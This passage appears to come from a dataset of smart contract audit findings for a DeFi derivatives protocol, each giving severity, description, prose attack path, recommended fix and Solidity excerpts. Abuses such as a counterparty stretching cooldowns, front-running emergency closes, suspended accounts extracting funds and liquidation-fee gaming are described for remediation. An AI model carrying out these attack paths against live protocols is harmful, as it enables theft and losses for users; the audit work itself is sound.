would get as a result of the difference between `closePrice` and `upnlSig.price`, and checks if the user is solvent after that.\\nThe problem is that the function does not account for the opposite case, that is the case where the user would get an extra profit as a result of the difference between `closePrice` and `upnlSig.price`. This means that the user would not be able to close the position, even if at the end of the transaction they would be solvent.\\nProof of Concept\\nThere is an open position with:\\nPosition type: LONG\\nQuantity: 1\\nLocked: 50\\nOpened price: 100\\nCurrent price: 110\\nQuote position uPnL Party A: 10\\nParty B calls `fillCloseRequest` with:\\nClosed price: 120\\nIn `isSolventAfterClosePosition` the following is calculated:\\n```\\npartyAAvailableBalance = freeBalance + upnl + unlockedAmount = -5\\n```\\n\\nAnd it reverts on:\\n```\\nrequire(\\n partyBAvailableBalance >= 0 && partyAAvailableBalance >= 0,\\n ""LibSolvency: Available balance is lower than zero""\\n);\\n```\\n\\nHowever, the extra profit for `closedPrice - upnlSig.price = 120 - 110 = 10` is not accounted for in the `partyAAvailableBalance` calculation, that should be `partyAAvailableBalance = - 5 + 10 = 5`. Party A would be solvent after closing the position, but the transaction reverts.",Add the extra profit to the `partyAAvailableBalance` calculation.,"In a situation where the difference between the closed price and the current price will make the user solvent, users will not be able to close their positions, even if at the end of the transaction they would be solvent.",```\\npartyAAvailableBalance = freeBalance + upnl + unlockedAmount = -5\\n```\\n +Malicious PartyB can block unfavorable close position requests causing a loss of profits for PartyB,medium,"Malicious PartyB can block close position requests that are unfavorable toward them by intentionally choose not to fulfill the close request and continuously prolonging the force close position cooldown period, causing a loss of profits for PartyA.\\nIf PartyA invokes the `requestToClosePosition` function for an open quote, the quote's status will transition from `QuoteStatus.OPEN` to `QuoteStatus.CLOSE_PENDING`. In case PartyB fails to fulfill the close request (fillCloseRequest) during the cooldown period (maLayout.forceCloseCooldown), PartyA has the option to forcibly close the quote by utilizing the `forceClosePosition` function.\\n```\\nFile: PartyAFacetImpl.sol\\n function forceClosePosition(uint256 quoteId, PairUpnlAndPriceSig memory upnlSig) internal {\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n MAStorage.Layout storage maLayout = MAStorage.layout();\\n Quote storage quote = QuoteStorage.layout().quotes[quoteId];\\n\\n uint256 filledAmount = quote.quantityToClose;\\n require(quote.quoteStatus == QuoteStatus.CLOSE_PENDING, ""PartyAFacet: Invalid state"");\\n require(\\n block.timestamp > quote.modifyTimestamp + maLayout.forceCloseCooldown,\\n ""PartyAFacet: Cooldown not reached""\\n );\\n..SNIP..\\n```\\n\\nNevertheless, malicious PartyB can intentionally choose not to fulfill the close request and can continuously prolong the `quote.modifyTimestamp`, thereby preventing PartyA from ever being able to activate the `forceClosePosition` function.\\nMalicious PartyB could extend the `quote.modifyTimestamp` via the following steps:\\nLine 282 of the `fillCloseRequest` show that it is possible to partially fill a close request. As such, calls the `fillCloseRequest` function with the minimum possible `filledAmount` for the purpose of triggering the `LibQuote.closeQuote` function at Line 292.\\n```\\nFile: PartyBFacetImpl.sol\\n function fillCloseRequest(\\n uint256 quoteId,\\n uint256 filledAmount,\\n uint256 closedPrice,\\n PairUpnlAndPriceSig memory upnlSig\\n ) internal {\\n..SNIP..\\n if (quote.orderType == OrderType.LIMIT) {\\n require(quote.quantityToClose >= filledAmount, ""PartyBFacet: Invalid filledAmount"");\\n } else {\\n require(quote.quantityToClose == filledAmount, ""PartyBFacet: Invalid filledAmount"");\\n }\\n..SNIP..\\n LibQuote.closeQuote(quote, filledAmount, closedPrice);\\n }\\n```\\n\\nOnce the `LibQuote.closeQuote` function is triggered, Line 153 will update the `quote.modifyTimestamp` to the current timestamp, which effectively extends the cooldown period that PartyA has to wait before allowing to forcefully close the position.\\n```\\nFile: LibQuote.sol\\n function closeQuote(Quote storage quote, uint256 filledAmount, uint256 closedPrice) internal {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n\\n quote.modifyTimestamp = block.timestamp;\\n..SNIP..\\n```\\n","The `quote.modifyTimestamp` is updated to the current timestamp in many functions, including the `closeQuote` function, as shown in the above example. A quick search within the codebase shows that there are around 17 functions that update the `quote.modifyTimestamp` to the current timestamp when triggered. Each of these functions serves as a potential attack vector for malicious PartyB to extend the `quote.modifyTimestamp` and deny users from forcefully closing their positions\\nIt is recommended not to use the `quote.modifyTimestamp` for the purpose of determining if the force close position cooldown has reached, as this variable has been used in many other places. Instead, consider creating a new variable, such as `quote.requestClosePositionTimestamp` solely for the purpose of computing the force cancel quote cooldown.\\nThe following fixes will prevent malicious PartyB from extending the cooldown period since the `quote.requestClosePositionTimestamp` variable is only used solely for the purpose of determining if the force close position cooldown has reached.\\n```\\nfunction requestToClosePosition(\\n uint256 quoteId,\\n uint256 closePrice,\\n uint256 quantityToClose,\\n OrderType orderType,\\n uint256 deadline,\\n SingleUpnlAndPriceSig memory upnlSig\\n) internal {\\n..SNIP..\\n accountLayout.partyANonces[quote.partyA] // Add the line below\\n= 1;\\n quote.modifyTimestamp = block.timestamp;\\n// Add the line below\\n quote.requestCancelQuoteTimestamp = block.timestamp;\\n```\\n\\n```\\nfunction forceClosePosition(uint256 quoteId, PairUpnlAndPriceSig memory upnlSig) internal {\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n MAStorage.Layout storage maLayout = MAStorage.layout();\\n Quote storage quote = QuoteStorage.layout().quotes[quoteId];\\n\\n uint256 filledAmount = quote.quantityToClose;\\n require(quote.quoteStatus == QuoteStatus.CLOSE_PENDING, ""PartyAFacet: Invalid state"");\\n require(\\n// Remove the line below\\n block.timestamp > quote.modifyTimestamp // Add the line below\\n maLayout.forceCloseCooldown,\\n// Add the line below\\n block.timestamp > quote.requestCancelQuoteTimestamp // Add the line below\\n maLayout.forceCloseCooldown,\\n ""PartyAFacet: Cooldown not reached""\\n );\\n```\\n\\nIn addition, review the `forceClosePosition` function and applied the same fix to it since it is vulnerable to the same issue, but with a different impact.","PartyB has the ability to deny users from forcefully closing their positions by exploiting the issue. Malicious PartyB could abuse this by blocking PartyA from closing their positions against them when the price is unfavorable toward them. For instance, when PartyA is winning the game and decided to close some of its positions against PartyB, PartyB could block the close position request to deny PartyA of their profits and prevent themselves from losing the game.","```\\nFile: PartyAFacetImpl.sol\\n function forceClosePosition(uint256 quoteId, PairUpnlAndPriceSig memory upnlSig) internal {\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n MAStorage.Layout storage maLayout = MAStorage.layout();\\n Quote storage quote = QuoteStorage.layout().quotes[quoteId];\\n\\n uint256 filledAmount = quote.quantityToClose;\\n require(quote.quoteStatus == QuoteStatus.CLOSE_PENDING, ""PartyAFacet: Invalid state"");\\n require(\\n block.timestamp > quote.modifyTimestamp + maLayout.forceCloseCooldown,\\n ""PartyAFacet: Cooldown not reached""\\n );\\n..SNIP..\\n```\\n" +Users might immediately be liquidated after position opening leading to a loss of CVA and Liquidation fee,medium,"The insolvency check (isSolventAfterOpenPosition) within the `openPosition` function does not consider the locked balance adjustment, causing the user account to become insolvent immediately after the position is opened. As a result, the affected users will lose their CVA and liquidation fee locked in their accounts.\\n```\\nFile: PartyBFacetImpl.sol\\n function openPosition(\\n uint256 quoteId,\\n uint256 filledAmount,\\n uint256 openedPrice,\\n PairUpnlAndPriceSig memory upnlSig\\n ) internal returns (uint256 currentId) {\\n..SNIP..\\n LibSolvency.isSolventAfterOpenPosition(quoteId, filledAmount, upnlSig);\\n\\n accountLayout.partyANonces[quote.partyA] += 1;\\n accountLayout.partyBNonces[quote.partyB][quote.partyA] += 1;\\n quote.modifyTimestamp = block.timestamp;\\n\\n LibQuote.removeFromPendingQuotes(quote);\\n\\n if (quote.quantity == filledAmount) {\\n accountLayout.pendingLockedBalances[quote.partyA].subQuote(quote);\\n accountLayout.partyBPendingLockedBalances[quote.partyB][quote.partyA].subQuote(quote);\\n\\n if (quote.orderType == OrderType.LIMIT) {\\n quote.lockedValues.mul(openedPrice).div(quote.requestedOpenPrice);\\n }\\n accountLayout.lockedBalances[quote.partyA].addQuote(quote);\\n accountLayout.partyBLockedBalances[quote.partyB][quote.partyA].addQuote(quote);\\n }\\n```\\n\\nThe leverage of a position is computed based on the following formula.\\n$leverage = \\frac{price \\times quantity}{lockedValues.total()}$\\nWhen opening a position, there is a possibility that the leverage might change because the locked values and quantity are fixed, but it could get filled with a different market price compared to the one at the moment the user requested. Thus, the purpose of Line 163 above is to adjust the locked values to maintain a fixed leverage. After the adjustment, the locked value might be higher or lower.\\nThe issue is that the insolvency check at Line 150 is performed before the adjustment is made.\\nAssume that the adjustment in Line 163 cause the locked values to increase. The insolvency check (isSolventAfterOpenPosition) at Line 150 will be performed with old or unadjusted locked values that are smaller than expected. Since smaller locked values mean that there will be more available balance, this might cause the system to miscalculate that an account is not liquidatable, but in fact, it is actually liquidatable once the adjusted increased locked value is taken into consideration.\\nIn this case, once the position is opened, the user account is immediately underwater and can be liquidated.\\nThe issue will occur in the ""complete fill"" path and ""partial fill"" path since both paths adjust the locked values to maintain a fixed leverage. The ""complete fill"" path adjusts the locked values at Line 185",Consider performing the insolvency check with the updated adjusted locked values.,"Users might become liquidatable immediately after opening a position due to an incorrect insolvency check within the `openPosition`, which erroneously reports that the account will still be healthy after opening the position, while in reality, it is not. As a result, the affected users will lose their CVA and liquidation fee locked in their accounts.","```\\nFile: PartyBFacetImpl.sol\\n function openPosition(\\n uint256 quoteId,\\n uint256 filledAmount,\\n uint256 openedPrice,\\n PairUpnlAndPriceSig memory upnlSig\\n ) internal returns (uint256 currentId) {\\n..SNIP..\\n LibSolvency.isSolventAfterOpenPosition(quoteId, filledAmount, upnlSig);\\n\\n accountLayout.partyANonces[quote.partyA] += 1;\\n accountLayout.partyBNonces[quote.partyB][quote.partyA] += 1;\\n quote.modifyTimestamp = block.timestamp;\\n\\n LibQuote.removeFromPendingQuotes(quote);\\n\\n if (quote.quantity == filledAmount) {\\n accountLayout.pendingLockedBalances[quote.partyA].subQuote(quote);\\n accountLayout.partyBPendingLockedBalances[quote.partyB][quote.partyA].subQuote(quote);\\n\\n if (quote.orderType == OrderType.LIMIT) {\\n quote.lockedValues.mul(openedPrice).div(quote.requestedOpenPrice);\\n }\\n accountLayout.lockedBalances[quote.partyA].addQuote(quote);\\n accountLayout.partyBLockedBalances[quote.partyB][quote.partyA].addQuote(quote);\\n }\\n```\\n" +Suspended PartyBs can bypass the withdrawal restriction by exploiting `fillCloseRequest`,medium,"Suspended PartyBs can bypass the withdrawal restriction by exploiting `fillCloseRequest` function. Thus, an attacker can transfer the ill-gotten gains out of the protocol, leading to a loss of assets for the protocol and its users.\\n```\\nFile: AccountFacet.sol\\n function withdraw(uint256 amount) external whenNotAccountingPaused notSuspended(msg.sender) {\\n AccountFacetImpl.withdraw(msg.sender, amount);\\n emit Withdraw(msg.sender, msg.sender, amount);\\n }\\n\\n function withdrawTo(\\n address user,\\n uint256 amount\\n ) external whenNotAccountingPaused notSuspended(msg.sender) {\\n AccountFacetImpl.withdraw(user, amount);\\n emit Withdraw(msg.sender, user, amount);\\n }\\n```\\n\\nWhen a user is suspended, they are not allowed to call any of the `withdraw` functions (withdraw and withdrawTo) to `withdraw` funds from their account. These withdrawal functions are guarded by the `notSuspended` modifier that will revert if the user's address is suspended.\\n```\\nFile: Accessibility.sol\\n modifier notSuspended(address user) {\\n require(\\n !AccountStorage.layout().suspendedAddresses[user],\\n ""Accessibility: Sender is Suspended""\\n );\\n _;\\n }\\n```\\n\\nHowever, suspected PartyBs can bypass this restriction by exploiting the `fillCloseRequest` function to transfer the assets out of the protocol. Following describe the proof-of-concept:\\nAnyone can be a PartyA within the protocol. Suspended PartyBs use one of their wallet addresses to operate as a PartyA.\\nUse the PartyA to create a new position with an unfavorable price that will immediately result in a significant loss for any PartyB who takes on the position. The `partyBsWhiteList` of the new position is set to PartyB address only to prevent some other PartyB from taking on this position.\\nOnce PartyB takes on the position, PartyB will immediately incur a significant loss, while PartyA will enjoy a significant gain due to the zero-sum nature of this game.\\nPartyA requested to close its position to lock the profits and PartyB will fill the close request.\\nPartyA calls the deallocate and withdraw functions to move the assets/gains out of the protocol.","Add the `notSuspended` modifier to the `openPosition` and `fillCloseRequest` functions to block the above-described attack path.\\n```\\nfunction fillCloseRequest(\\n uint256 quoteId,\\n uint256 filledAmount,\\n uint256 closedPrice,\\n PairUpnlAndPriceSig memory upnlSig\\n// Remove the line below\\n ) external whenNotPartyBActionsPaused onlyPartyBOfQuote(quoteId) notLiquidated(quoteId) {\\n// Add the line below\\n ) external whenNotPartyBActionsPaused onlyPartyBOfQuote(quoteId) notLiquidated(quoteId) notSuspended(msg.sender) {\\n ..SNIP..\\n}\\n```\\n\\n```\\nfunction openPosition(\\n uint256 quoteId,\\n uint256 filledAmount,\\n uint256 openedPrice,\\n PairUpnlAndPriceSig memory upnlSig\\n// Remove the line below\\n ) external whenNotPartyBActionsPaused onlyPartyBOfQuote(quoteId) notLiquidated(quoteId) {\\n// Add the line below\\n ) external whenNotPartyBActionsPaused onlyPartyBOfQuote(quoteId) notLiquidated(quoteId) notSuspended(msg.sender) {\\n ..SNIP..\\n}\\n```\\n","In the event of an attack, the protocol will suspend the malicious account and prevent it from transferring ill-gotten gains out of the protocol. However, since this restriction can be bypassed, the attacker can transfer the ill-gotten gains out of the protocol, leading to a loss of assets for the protocol and its users.","```\\nFile: AccountFacet.sol\\n function withdraw(uint256 amount) external whenNotAccountingPaused notSuspended(msg.sender) {\\n AccountFacetImpl.withdraw(msg.sender, amount);\\n emit Withdraw(msg.sender, msg.sender, amount);\\n }\\n\\n function withdrawTo(\\n address user,\\n uint256 amount\\n ) external whenNotAccountingPaused notSuspended(msg.sender) {\\n AccountFacetImpl.withdraw(user, amount);\\n emit Withdraw(msg.sender, user, amount);\\n }\\n```\\n" +Imbalanced approach of distributing the liquidation fee within `setSymbolsPrice` function,medium,"The imbalance approach of distributing the liquidation fee within `setSymbolsPrice` function could be exploited by malicious liquidators to obtain the liquidation fee without completing their tasks and maximizing their gains. While doing so, it causes harm or losses to other parties within the protocols.\\nA PartyA can own a large number of different symbols in its portfolio. To avoid out-of-gas (OOG) errors from occurring during liquidation, the `setSymbolsPrice` function allows the liquidators to inject the price of the symbols in multiple transactions instead of all in one go.\\nAssume that the injection of the price symbols requires 5 transactions/rounds to complete and populate the price of all the symbols in a PartyA's portfolio. Based on the current implementation, only the first liquidator that calls the `setSymbolsPrice` will receive the liquidation fee. Liquidators that call the `setSymbolsPrice` function subsequently will not be added to the `AccountStorage.layout().liquidators[partyA]` listing as Line 88 will only be executed once when the `liquidationType` is still not initialized yet.\\n```\\nFile: LiquidationFacetImpl.sol\\n function setSymbolsPrice(address partyA, PriceSig memory priceSig) internal {\\n..SNIP..\\n if (accountLayout.liquidationDetails[partyA].liquidationType == LiquidationType.NONE) {\\n accountLayout.liquidationDetails[partyA] = LiquidationDetail({\\n liquidationType: LiquidationType.NONE,\\n upnl: priceSig.upnl,\\n totalUnrealizedLoss: priceSig.totalUnrealizedLoss,\\n deficit: 0,\\n liquidationFee: 0\\n });\\n..SNIP..\\n AccountStorage.layout().liquidators[partyA].push(msg.sender);\\n } else {\\n require(\\n accountLayout.liquidationDetails[partyA].upnl == priceSig.upnl &&\\n accountLayout.liquidationDetails[partyA].totalUnrealizedLoss ==\\n priceSig.totalUnrealizedLoss,\\n ""LiquidationFacet: Invalid upnl sig""\\n );\\n }\\n }\\n```\\n\\nA malicious liquidator could take advantage of this by only setting the symbol prices for the first round for each liquidation happening in the protocol. To maximize their profits, the malicious liquidator would call the `setSymbolsPrice` with none or only one (1) symbol price to save on the gas cost. The malicious liquidator would then leave it to the others to complete the rest of the liquidation process, and they will receive half of the liquidation fee at the end of the liquidation process.\\nSomeone would eventually need to step in to complete the liquidation process. Even if none of the liquidators is incentivized to complete the process of setting the symbol prices since they will not receive any liquidation fee, the counterparty would eventually have no choice but to step in to perform the liquidation themselves. Otherwise, the profits of the counterparty cannot be realized. At the end of the day, the liquidation will be completed, and the malicious liquidator will still receive the liquidation fee.","Consider a more balanced approach for distributing the liquidation fee for liquidators that calls the `setSymbolsPrice` function. For instance, the liquidators should be compensated based on the number of symbol prices they have injected.\\nIf there are 10 symbols to be filled up, if Bob filled up 4 out of 10 symbols, he should only receive 40% of the liquidation fee. This approach has already been implemented within the `liquidatePartyB` function via the `partyBPositionLiquidatorsShare` variable. Thus, the same design could be retrofitted into the `setSymbolsPrice` function.","Malicious liquidators could exploit the liquidation process to obtain the liquidation fee without completing their tasks and maximizing their gains. While doing so, many liquidations would be stuck halfway since it is likely that no other liquidators will step in to complete the setting of the symbol prices because they will not receive any liquidation fee for doing so (not incentivized).\\nThis could potentially lead to the loss of assets for various parties:\\nThe counterparty would eventually have no choice but to step in to perform the liquidation themselves. The counterparty has to pay for its own liquidation, even though it has already paid half the liquidation fee to the liquidator.\\nMany liquidations would be stuck halfway, and liquidation might be delayed, which exposes users to greater market risks, including the risk of incurring larger losses or having to exit at an unfavorable price.","```\\nFile: LiquidationFacetImpl.sol\\n function setSymbolsPrice(address partyA, PriceSig memory priceSig) internal {\\n..SNIP..\\n if (accountLayout.liquidationDetails[partyA].liquidationType == LiquidationType.NONE) {\\n accountLayout.liquidationDetails[partyA] = LiquidationDetail({\\n liquidationType: LiquidationType.NONE,\\n upnl: priceSig.upnl,\\n totalUnrealizedLoss: priceSig.totalUnrealizedLoss,\\n deficit: 0,\\n liquidationFee: 0\\n });\\n..SNIP..\\n AccountStorage.layout().liquidators[partyA].push(msg.sender);\\n } else {\\n require(\\n accountLayout.liquidationDetails[partyA].upnl == priceSig.upnl &&\\n accountLayout.liquidationDetails[partyA].totalUnrealizedLoss ==\\n priceSig.totalUnrealizedLoss,\\n ""LiquidationFacet: Invalid upnl sig""\\n );\\n }\\n }\\n```\\n" +Liquidators will not be incentivized to liquidate certain PartyB accounts due to the lack of incentives,medium,"Liquidating certain accounts does not provide a liquidation fee to the liquidators. Liquidators will not be incentivized to liquidate such accounts, which may lead to liquidation being delayed or not performed, exposing Party B to unnecessary risks and potentially resulting in greater asset losses than anticipated.\\n```\\nFile: LiquidationFacetImpl.sol\\n function liquidatePartyB(\\n..SNIP..\\n if (uint256(-availableBalance) < accountLayout.partyBLockedBalances[partyB][partyA].lf) {\\n remainingLf =\\n accountLayout.partyBLockedBalances[partyB][partyA].lf -\\n uint256(-availableBalance);\\n liquidatorShare = (remainingLf * maLayout.liquidatorShare) / 1e18;\\n\\n maLayout.partyBPositionLiquidatorsShare[partyB][partyA] =\\n (remainingLf - liquidatorShare) /\\n quoteLayout.partyBPositionsCount[partyB][partyA];\\n } else {\\n maLayout.partyBPositionLiquidatorsShare[partyB][partyA] = 0;\\n }\\n```\\n\\nAssume that the loss of Party B is more than the liquidation fee. In this case, the else branch of the above code within the `liquidatePartyB` function will be executed. The `liquidatorShare` and `partyBPositionLiquidatorsShare` variables will both be zero, which means the liquidators will get nothing in return for liquidating PartyBs\\nAs a result, there will not be any incentive for the liquidators to liquidate such positions.",Considering updating the liquidation incentive mechanism that will always provide some incentive for the liquidators to take the initiative to liquidate insolvent accounts. This will help to build a more robust and efficient liquidation mechanism for the protocols. One possible approach is to always give a percentage of the CVA of the liquidated account as a liquidation fee to the liquidators.,"Liquidators will not be incentivized to liquidate those accounts that do not provide them with a liquidation fee. As a result, the liquidation of those accounts might be delayed or not performed at all. When liquidation is not performed in a timely manner, PartyB ended up taking on additional unnecessary risks that could be avoided in the first place if a different liquidation incentive mechanism is adopted, potentially leading to PartyB losing more assets than expected.\\nAlthough PartyBs are incentivized to perform liquidation themselves since it is the PartyBs that take on the most risks from the late liquidation, the roles of PartyB and liquidator are clearly segregated in the protocol design. Only addresses granted the role of liquidators can perform liquidation as the liquidation functions are guarded by `onlyRole(LibAccessibility.LIQUIDATOR_ROLE)`. Unless the contracts are implemented in a manner that automatically grants a liquidator role to all new PartyB upon registration OR liquidation functions are made permissionless, PartyBs are likely not able to perform the liquidation themselves when the need arises.\\nMoreover, the PartyBs are not expected to be both a hedger and liquidator simultaneously as they might not have the skillset or resources to maintain an infrastructure for monitoring their accounts/positions for potential late liquidation.",```\\nFile: LiquidationFacetImpl.sol\\n function liquidatePartyB(\\n..SNIP..\\n if (uint256(-availableBalance) < accountLayout.partyBLockedBalances[partyB][partyA].lf) {\\n remainingLf =\\n accountLayout.partyBLockedBalances[partyB][partyA].lf -\\n uint256(-availableBalance);\\n liquidatorShare = (remainingLf * maLayout.liquidatorShare) / 1e18;\\n\\n maLayout.partyBPositionLiquidatorsShare[partyB][partyA] =\\n (remainingLf - liquidatorShare) /\\n quoteLayout.partyBPositionsCount[partyB][partyA];\\n } else {\\n maLayout.partyBPositionLiquidatorsShare[partyB][partyA] = 0;\\n }\\n```\\n +`emergencyClosePosition` can be blocked,medium,"The `emergencyClosePosition` function can be blocked as PartyA can change the position's status, which causes the transaction to revert when executed.\\nActivating the emergency mode can be done either for a specific PartyB or for the entire system. Once activated, PartyB gains the ability to swiftly close positions without requiring users' requests. This functionality is specifically designed to cater to urgent situations where PartyBs must promptly close their positions.\\nBased on the `PartyBFacetImpl.emergencyClosePosition` function, a position can only be ""emergency"" close if its status is `QuoteStatus.OPENED`.\\n```\\nFile: PartyBFacetImpl.sol\\n function emergencyClosePosition(uint256 quoteId, PairUpnlAndPriceSig memory upnlSig) internal {\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n Quote storage quote = QuoteStorage.layout().quotes[quoteId];\\n require(quote.quoteStatus == QuoteStatus.OPENED, ""PartyBFacet: Invalid state"");\\n..SNIP..\\n```\\n\\nAs a result, if PartyA knows that emergency mode has been activated, PartyA could pre-emptively call the `PartyAFacetImpl.requestToClosePosition` with minimum possible `quantityToClose` (e.g. 1 wei) against their positions to change the state to `QuoteStatus.CLOSE_PENDING` so that the `PartyBFacetImpl.emergencyClosePosition` function will always revert when triggered by PartyB. This effectively blocks PartyB from ""emergency"" close the positions in urgent situations.\\nPartyA could also block PartyB ""emergency"" close on-demand by front-running PartyB's `PartyBFacetImpl.emergencyClosePosition` transaction with the `PartyAFacetImpl.requestToClosePosition` with minimum possible `quantityToClose` (e.g. 1 wei) when detected.\\nPartyB could accept the close position request of 1 wei to revert the quote's status back to `QuoteStatus.OPENED` and try to perform an ""emergency"" close again. However, a sophisticated malicious user could front-run PartyA to revert the quote's status back to `QuoteStatus.CLOSE_PENDING` again to block the ""emergency"" close for a second time.","Update the `emergencyClosePosition` so that the ""emergency"" close can still proceed even if the position's status is `QuoteStatus.CLOSE_PENDING`.\\n```\\nfunction emergencyClosePosition(uint256 quoteId, PairUpnlAndPriceSig memory upnlSig) internal {\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n Quote storage quote = QuoteStorage.layout().quotes[quoteId];\\n// Remove the line below\\n require(quote.quoteStatus == QuoteStatus.OPENED, ""PartyBFacet: Invalid state"");\\n// Add the line below\\n require(quote.quoteStatus == QuoteStatus.OPENED || quote.quoteStatus == QuoteStatus.CLOSE_PENDING, ""PartyBFacet: Invalid state"");\\n..SNIP..\\n```\\n","During urgent situations where emergency mode is activated, the positions need to be promptly closed to avoid negative events that could potentially lead to serious loss of funds (e.g. the protocol is compromised, and the attacker is planning to or has started draining funds from the protocols). However, if the emergency closure of positions is blocked or delayed, it might lead to unrecoverable losses.","```\\nFile: PartyBFacetImpl.sol\\n function emergencyClosePosition(uint256 quoteId, PairUpnlAndPriceSig memory upnlSig) internal {\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n Quote storage quote = QuoteStorage.layout().quotes[quoteId];\\n require(quote.quoteStatus == QuoteStatus.OPENED, ""PartyBFacet: Invalid state"");\\n..SNIP..\\n```\\n" +Position value can fall below the minimum acceptable quote value,medium,"PartyB can fill a LIMIT order position till the point where the value is below the minimum acceptable quote value (minAcceptableQuoteValue). As a result, it breaks the invariant that the value of position must be above the minimum acceptable quote value, leading to various issues and potentially losses for the users.\\n```\\nFile: LibQuote.sol\\n function closeQuote(Quote storage quote, uint256 filledAmount, uint256 closedPrice) internal {\\n..SNIP..\\n if (quote.closedAmount == quote.quantity) {\\n quote.quoteStatus = QuoteStatus.CLOSED;\\n quote.requestedClosePrice = 0;\\n removeFromOpenPositions(quote.id);\\n quoteLayout.partyAPositionsCount[quote.partyA] -= 1;\\n quoteLayout.partyBPositionsCount[quote.partyB][quote.partyA] -= 1;\\n } else if (\\n quote.quoteStatus == QuoteStatus.CANCEL_CLOSE_PENDING || quote.quantityToClose == 0\\n ) {\\n quote.quoteStatus = QuoteStatus.OPENED;\\n quote.requestedClosePrice = 0;\\n quote.quantityToClose = 0; // for CANCEL_CLOSE_PENDING status\\n } else {\\n require(\\n quote.lockedValues.total() >=\\n SymbolStorage.layout().symbols[quote.symbolId].minAcceptableQuoteValue,\\n ""LibQuote: Remaining quote value is low""\\n );\\n }\\n }\\n```\\n\\nIf the user has already sent the close request, but partyB has not filled it yet, the user can request to cancel it by calling the `CancelCloseRequest` function. This will cause the quote's status to change to `QuoteStatus.CANCEL_CLOSE_PENDING`.\\nPartyB can either accept the cancel request or fill the close request ignoring the user's request. If PartyB decided to go ahead to fill the close request partially, the second branch of the if-else statement at Line 196 will be executed. However, the issue is that within this branch, PartyB is not subjected to the `minAcceptableQuoteValue` validation check. Thus, it is possible for PartyB to fill a LIMIT order position till the point where the value is below the minimum acceptable quote value (minAcceptableQuoteValue).","If the user sends a close request and PartyB decides to go ahead to fill the close request partially, consider checking if the remaining value of the position is above the minimum acceptable quote value (minAcceptableQuoteValue) after PartyB has filled the position.\\n```\\nfunction closeQuote(Quote storage quote, uint256 filledAmount, uint256 closedPrice) internal {\\n ..SNIP..\\n if (quote.closedAmount == quote.quantity) {\\n quote.quoteStatus = QuoteStatus.CLOSED;\\n quote.requestedClosePrice = 0;\\n removeFromOpenPositions(quote.id);\\n quoteLayout.partyAPositionsCount[quote.partyA] -= 1;\\n quoteLayout.partyBPositionsCount[quote.partyB][quote.partyA] -= 1;\\n } else if (\\n quote.quoteStatus == QuoteStatus.CANCEL_CLOSE_PENDING || quote.quantityToClose == 0\\n ) {\\n quote.quoteStatus = QuoteStatus.OPENED;\\n quote.requestedClosePrice = 0;\\n quote.quantityToClose = 0; // for CANCEL_CLOSE_PENDING status\\n// Add the line below\\n \\n// Add the line below\\n require(\\n// Add the line below\\n quote.lockedValues.total() >=\\n// Add the line below\\n SymbolStorage.layout().symbols[quote.symbolId].minAcceptableQuoteValue,\\n// Add the line below\\n ""LibQuote: Remaining quote value is low""\\n// Add the line below\\n );\\n } else {\\n require(\\n quote.lockedValues.total() >=\\n SymbolStorage.layout().symbols[quote.symbolId].minAcceptableQuoteValue,\\n ""LibQuote: Remaining quote value is low""\\n );\\n }\\n}\\n```\\n","In the codebase, the `minAcceptableQuoteValue` is currently set to 5 USD. There are many reasons for having a minimum quote value in the first place. For instance, if the value of a position is too low, it will be uneconomical for the liquidator to liquidate the position because the liquidation fee would be too small or insufficient to cover the cost of liquidation. Note that the liquidation fee is computed as a percentage of the position value.\\nThis has a negative impact on the overall efficiency of the liquidation mechanism within the protocol, which could delay or stop the liquidation of accounts or positions, exposing users to greater market risks, including the risk of incurring larger losses or having to exit at an unfavorable price.","```\\nFile: LibQuote.sol\\n function closeQuote(Quote storage quote, uint256 filledAmount, uint256 closedPrice) internal {\\n..SNIP..\\n if (quote.closedAmount == quote.quantity) {\\n quote.quoteStatus = QuoteStatus.CLOSED;\\n quote.requestedClosePrice = 0;\\n removeFromOpenPositions(quote.id);\\n quoteLayout.partyAPositionsCount[quote.partyA] -= 1;\\n quoteLayout.partyBPositionsCount[quote.partyB][quote.partyA] -= 1;\\n } else if (\\n quote.quoteStatus == QuoteStatus.CANCEL_CLOSE_PENDING || quote.quantityToClose == 0\\n ) {\\n quote.quoteStatus = QuoteStatus.OPENED;\\n quote.requestedClosePrice = 0;\\n quote.quantityToClose = 0; // for CANCEL_CLOSE_PENDING status\\n } else {\\n require(\\n quote.lockedValues.total() >=\\n SymbolStorage.layout().symbols[quote.symbolId].minAcceptableQuoteValue,\\n ""LibQuote: Remaining quote value is low""\\n );\\n }\\n }\\n```\\n" +Rounding error when closing quote,medium,"Rounding errors could occur if the provided `filledAmount` is too small, resulting in the locked balance of an account remains the same even though a certain amount of the position has been closed.\\n```\\nFile: LibQuote.sol\\n function closeQuote(Quote storage quote, uint256 filledAmount, uint256 closedPrice) internal {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n\\n quote.modifyTimestamp = block.timestamp;\\n\\n LockedValues memory lockedValues = LockedValues(\\n quote.lockedValues.cva -\\n ((quote.lockedValues.cva * filledAmount) / (LibQuote.quoteOpenAmount(quote))),\\n quote.lockedValues.mm -\\n ((quote.lockedValues.mm * filledAmount) / (LibQuote.quoteOpenAmount(quote))),\\n quote.lockedValues.lf -\\n ((quote.lockedValues.lf * filledAmount) / (LibQuote.quoteOpenAmount(quote)))\\n );\\n accountLayout.lockedBalances[quote.partyA].subQuote(quote).add(lockedValues);\\n accountLayout.partyBLockedBalances[quote.partyB][quote.partyA].subQuote(quote).add(\\n lockedValues\\n );\\n quote.lockedValues = lockedValues;\\n\\n (bool hasMadeProfit, uint256 pnl) = LibQuote.getValueOfQuoteForPartyA(\\n closedPrice,\\n filledAmount,\\n quote\\n );\\n if (hasMadeProfit) {\\n accountLayout.allocatedBalances[quote.partyA] += pnl;\\n accountLayout.partyBAllocatedBalances[quote.partyB][quote.partyA] -= pnl;\\n } else {\\n accountLayout.allocatedBalances[quote.partyA] -= pnl;\\n accountLayout.partyBAllocatedBalances[quote.partyB][quote.partyA] += pnl;\\n }\\n```\\n\\nIn Lines 157, 159, and 161 above, a malicious user could make the numerator smaller 